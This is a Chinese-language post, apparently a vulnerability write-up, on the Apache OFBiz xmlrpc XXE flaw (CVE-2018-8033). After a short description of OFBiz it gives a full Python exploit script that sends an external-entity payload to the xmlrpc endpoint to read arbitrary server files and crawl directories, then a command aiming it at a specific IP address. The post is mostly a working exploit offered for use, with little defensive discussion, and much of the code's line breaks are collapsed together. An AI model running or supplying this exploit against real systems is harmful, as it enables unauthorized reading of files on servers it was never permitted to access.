Apache OFBiz xmlrpc XXE漏洞（CVE-2018-8033）

目录

1、漏洞描述

2、EXP下载地址

3、EXP利用

1、漏洞描述

        Apache OFBiz是一套企业资源计划（ERP）系统。它提供了广泛的功能，包括销售、采购、库存、财务、CRM等。 Apache OFBiz还具有灵活的架构和可扩展性，允许用户根据业务需求进行定制和拓展。 Apache OFBiz 是一个用 Java 编写的企业资源规划 (ERP) 系统，它是一个开放源代码、可扩展的企业级应用程序。 OFBiz 旨在为各种规模的企业提供全面的业务管理解决方案。 它包含大量的库、实体、服务和功能，覆盖了企业运营的各个方面，如销售、采购、库存、财务、人力资源等。

2、EXP下载地址

https://github.com/jamieparfet/Apache-OFBiz-XXE/

#!/usr/bin/env python3
# *****************************************************
# Type: XML External Entity Injection (File disclosure)
# Target: Apache OFBiz < 16.11.04
# Author: Jamie Parfet
# *****************************************************
import sys
import os
import requests
import urllib3
import re
import argparseurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)simple_payload = """<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://{}">]>
<methodCall><methodName>xXx
&disclose;xXx</methodName></methodCall>
"""if len(sys.argv) <= 1:print('[*] Apache OFBiz < 16.11.04 XXE')print('[*] Use "%s -h" to display help.' % (sys.argv[0]))exit(0)parser = argparse.ArgumentParser()
parser.add_argument("-u",metavar="https://localhost:8443",dest="url",required=True,help="Target URL (required)",action='store')
parser.add_argument("-f",metavar="/etc/passwd",dest="file",help="Target file",action='store')
parser.add_argument("-c",metavar="/home/",dest="crawl",help="Target directory to start crawling from",action='store')
parser.add_argument("-o",metavar="~/local/output/directory/",dest="output_dir",help="Local directory that remote file will be saved to",action='store')
args = parser.parse_args()
url = args.url if args.url else None
target_file = args.file if args.file else None
crawl_dir = args.crawl if args.crawl else None
output_dir = args.output_dir if args.output_dir else Nonedef check_url(url):if '://' not in url:print('[-] ERROR: Please include protocol in URL, such as https://{}'.format(url))exit(0)else:return urldef request(url, payload):response = requests.post(url + '/webtools/control/xmlrpc', data=payload, verify=False).textparsed_response = re.sub(r'(.*xXx\n|xXx.*)', '', response)return parsed_responsedef crawl(crawl_dir):payload = simple_payload.format(crawl_dir)response = request(url, payload)payload_404 = simple_payload.format(crawl_dir + "/xX404Xx")response_404 = request(url, payload_404)if 'No such file or directory' in response:print("[-] ERROR - 404: {}".format(crawl_dir))elif 'Permission denied' in response or 'but is not accessible' in response:print("[-] ERROR - Permission: {}".format(crawl_dir))elif 'Not a directory' in response_404:print("[*] FILE: {}".format(crawl_dir))else:print("[*] DIR: {}".format(crawl_dir))for f in response.splitlines():full_path = (crawl_dir + '/' + f)crawl(full_path)def main(url=url, target_file=target_file, crawl_dir=crawl_dir, output_dir=output_dir):if url:check_url(url)if crawl_dir:crawl(crawl_dir)else:payload = simple_payload.format(target_file)if output_dir:if os.path.isdir(output_dir):result = request(url, payload)remote_file_name = re.sub('/', '--', target_file)output_file = (output_dir + '/' + remote_file_name[2:])file = open(output_file, 'w')file.write(result)file.close()else:print("[-] ERROR: {} is not a writeable directory".format(output_dir))else:result = request(url, payload)print(result)if __name__ == '__main__':try:main()except KeyboardInterrupt:print('\nKeyboard interrupt detected.')print('Exiting...')exit(0)

3、EXP利用

F:\>python cve_2018_8033.py -u http://193.168.0.45:28703/ -f /tmp